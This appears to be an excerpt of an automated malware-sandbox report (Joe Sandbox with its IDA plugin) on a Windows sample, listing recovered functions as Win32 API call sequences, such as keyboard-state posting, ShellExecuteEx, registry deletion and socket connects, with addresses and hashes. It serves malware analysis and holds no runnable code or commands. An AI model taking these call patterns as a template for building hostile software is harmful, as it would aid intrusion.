                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00EFBB4D
                                                                                                                                                                                                                                      • SendMessageW.USER32(013B5878,000000B0,?,?), ref: 00EFBB84
                                                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00EFBBC1
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(013B5878,000000EC), ref: 00EFBBE3
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EFBBFB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4072528602-0
                                                                                                                                                                                                                                      • Opcode ID: e078afbb3635f0f6904c6b554efde725dce7a7e0423ededc8fbd85e100233fbb
                                                                                                                                                                                                                                      • Instruction ID: 55657abd44b3e49ec9161b4fdc501fbcf6fb79f8691e43bc6dab5386ce3e0f41
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e078afbb3635f0f6904c6b554efde725dce7a7e0423ededc8fbd85e100233fbb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B71DD3460460CEFDB21DF54C894FBABBBAFF49314F145059EA45A72A1DB32AC40DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EEFB31
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EEFBFA
                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00EEFC3F
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC
                                                                                                                                                                                                                                        • Part of subcall function 00E8436A: _wcscpy.LIBCMT ref: 00E8438D
                                                                                                                                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 00EEFCB6
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EEFCE5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 3522835683-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 6866401cc34cf46e6b0ee84f172c7836df53aca35dd4612229e0cfbf039e60ac
                                                                                                                                                                                                                                      • Instruction ID: 9f1bde1a141b1ae5eef09862c6890e30cc8bb8f0019d4570f8896d6739830bc4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6866401cc34cf46e6b0ee84f172c7836df53aca35dd4612229e0cfbf039e60ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8561AAB5A00619DFCB14EFA5C4909AEB7F4FF08310F249469E84ABB391CB30AD41CB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00ED178B
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00ED17A0
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00ED1801
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00ED182F
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00ED184E
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00ED1894
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00ED18B7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                      • Opcode ID: 846fb4c1e2efc4920f00f07c8812afa9c42519df3c6b6e5cfd153d819180a7ae
                                                                                                                                                                                                                                      • Instruction ID: 96fe02d066e509494e055ea42c085b6963a41eff19da1e8a5d9111d739516e6b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 846fb4c1e2efc4920f00f07c8812afa9c42519df3c6b6e5cfd153d819180a7ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51F7A0A087D53DFB368234CC15BBA7EE9AB06308F0C55CBE0D566AD2C695DCC6E750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(00000000), ref: 00ED15A4
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00ED15B9
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00ED161A
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00ED1646
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00ED1663
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00ED16A7
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00ED16C8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                      • Opcode ID: af8655ec60672ec6bfe10f2ffe3cbdb768991acbf9f7661684aad0732b0dd0d3
                                                                                                                                                                                                                                      • Instruction ID: 68ee710a84b251eae82346f88cba793e5e571529ff7688afc85d620783945e71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af8655ec60672ec6bfe10f2ffe3cbdb768991acbf9f7661684aad0732b0dd0d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F5118A06047D53DFB3283248C01BBA7EE9EB06304F0C54CBE0E5666C2C695EC96E750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2945705084-0
                                                                                                                                                                                                                                      • Opcode ID: 00bd6ae4f16184333548a70861faaedd2b5a871e08852ecab2f74aa7f9da3162
                                                                                                                                                                                                                                      • Instruction ID: cae7b5bafff6147f07e542bd5d18f0103191328cded17995594f00321b51b2a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00bd6ae4f16184333548a70861faaedd2b5a871e08852ecab2f74aa7f9da3162
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27416FA6C2061875CF11FBF4C8869CFB7F9EF04310F51A856E519F3221E634A61687A6
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ED4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED3B8A,?), ref: 00ED4BE0
                                                                                                                                                                                                                                        • Part of subcall function 00ED4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED3B8A,?), ref: 00ED4BF9
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00ED3BAA
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ED3BC6
                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00ED3BDE
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00ED3C26
                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 00ED3C92
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 1377345388-1173974218
                                                                                                                                                                                                                                      • Opcode ID: a7fbb7f4eee0e2b846b4c995840037b1b73e9c8ef6b459cb06b44092a6f8b5c8
                                                                                                                                                                                                                                      • Instruction ID: a7b1c7690e27745c1b24507c866df1ee586f52b1843ae7ab76433c6806fed1c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7fbb7f4eee0e2b846b4c995840037b1b73e9c8ef6b459cb06b44092a6f8b5c8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08418E71508344AAC752EB74C481ADFB7ECEF98340F40296FF489E3291EB35D6498B52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EF78CF
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF7976
                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 00EF798E
                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF79D6
                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00EF79E9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 5db64ee8245b1a25882fd26e5ae05fb79e41f03fadc75bdd21ea6f9d31be3426
                                                                                                                                                                                                                                      • Instruction ID: b626e469625090ca8d1fdb275434be41126776df03b7ea2ccb6419d9251c09cb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5db64ee8245b1a25882fd26e5ae05fb79e41f03fadc75bdd21ea6f9d31be3426
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE413771A08209EFDB20DF54D884AEABBB5FB45314F05912DEA95AB250C770ED50DFA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EF1631
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF165B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00EF1712
                                                                                                                                                                                                                                        • Part of subcall function 00EF1602: RegCloseKey.ADVAPI32(?), ref: 00EF1678
                                                                                                                                                                                                                                        • Part of subcall function 00EF1602: FreeLibrary.KERNEL32(?), ref: 00EF16CA
                                                                                                                                                                                                                                        • Part of subcall function 00EF1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EF16ED
                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EF16B5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 395352322-0
                                                                                                                                                                                                                                      • Opcode ID: da891efdb6f4edc2776e7d1d3e579bca97bd4b7aebb8669de449d8759f8c2c8f
                                                                                                                                                                                                                                      • Instruction ID: de0d2cafc907b1ace8fe0a419e47d638b3e896cbd1e8f2eed41e114c4771c959
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da891efdb6f4edc2776e7d1d3e579bca97bd4b7aebb8669de449d8759f8c2c8f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1311AB190110DFFDB149B90DC89AFEB7BCEF09304F0411AAEA15E2150EB749E45AAA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EF6911
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(013B5878,000000F0), ref: 00EF6944
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(013B5878,000000F0), ref: 00EF6979
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EF69AB
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EF69D5
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EF69E6
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EF6A00
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2178440468-0
                                                                                                                                                                                                                                      • Opcode ID: 07db82591805d0c915603770e9e77e16ee60f3a97027bb401f1c48e7753733df
                                                                                                                                                                                                                                      • Instruction ID: 36f9c1f3cf6ecf118491f6cb64df7a7fd580c174ca1f9cecfcf3b9760aeadf9a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07db82591805d0c915603770e9e77e16ee60f3a97027bb401f1c48e7753733df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9314F706042589FDB21DF18DC84F6537E2FB89728F1821A4F6149F2B1CBB2AC40EB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE2CA
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE2F0
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00ECE2F3
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00ECE311
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00ECE31A
                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00ECE33F
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00ECE34D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                      • Opcode ID: 83d46731bc9444363052bb392c6afe9c4d7aebb214141b5dd01f4a60cbda5ef8
                                                                                                                                                                                                                                      • Instruction ID: 3c2bc287ebc70ec508b01fe05fc9e5246d7567f9b2c33b531f94ad5717615a72
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83d46731bc9444363052bb392c6afe9c4d7aebb214141b5dd01f4a60cbda5ef8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D21A83560020DAFDF10DFA8CC48EBB77ACFB08364B044129F914EB250DA71AC429764
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EE8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EE84A0
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EE68B1
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE68C0
                                                                                                                                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE68F9
                                                                                                                                                                                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00EE6902
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE690C
                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00EE6935
                                                                                                                                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE694E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 910771015-0
                                                                                                                                                                                                                                      • Opcode ID: 5e8c34ec569346c6b4f58cc37fe3d49dee18a88b572bc3428eee76c9c2d1fdb4
                                                                                                                                                                                                                                      • Instruction ID: c6f4869503bdcec6cc1b84f9a78d52112db0dd05943a0e19cf9a84ae98333473
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e8c34ec569346c6b4f58cc37fe3d49dee18a88b572bc3428eee76c9c2d1fdb4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8031AD7160020CAFDB10AF65CC85FBA77E9EB54764F048029F949BB2D1CB75AC049BA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE3A5
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE3CB
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00ECE3CE
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00ECE3EF
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00ECE3F8
                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00ECE412
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00ECE420
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
